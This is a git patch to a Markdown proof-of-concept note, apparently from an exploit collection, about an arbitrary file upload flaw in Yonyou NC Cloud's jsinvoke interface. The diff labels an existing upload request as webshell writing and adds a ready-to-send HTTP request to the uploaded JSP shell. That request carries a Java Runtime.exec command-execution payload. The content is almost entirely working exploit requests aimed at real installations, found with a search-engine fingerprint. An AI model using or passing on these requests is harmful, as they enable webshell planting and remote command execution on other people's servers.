From 401716eba01e2c006fdf632492b0b1284d85efad Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 13 Nov 2023 19:19:39 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E7=94=A8=E5=8F=8B=20NC=20Cloud=20jsin?=
 =?UTF-8?q?voke=20=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 用友 NC Cloud jsinvoke 任意文件上传漏洞.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)

diff --git a/用友 NC Cloud jsinvoke 任意文件上传漏洞.md b/用友 NC Cloud jsinvoke 任意文件上传漏洞.md
index e6c4d24..db673c1 100644
--- a/用友 NC Cloud jsinvoke 任意文件上传漏洞.md	
+++ b/用友 NC Cloud jsinvoke 任意文件上传漏洞.md	
@@ -3,6 +3,7 @@
 用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限
 app="用友-NC-Cloud"
 
+## 写入webshell
 ```
 POST /uapjs/jsinvoke/?action=invoke
 Content-Type: application/json
@@ -40,3 +41,23 @@ Content-Type: application/x-www-form-urlencoded
 }
 
 ```
+
+## 执行命令
+```
+
+POST /407.jsp?error=bsh.Interpreter HTTP/1.1
+Host: *
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close    
+Cookie: JSESSIONID=80DA93FB2FFF0204E78FA82643D5BC6E
+If-Modified-Since: Fri, 09 Dec 2022 16:12:59 GMT
+If-None-Match: W/"370397-1670602379000"
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+           
+cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
+```
+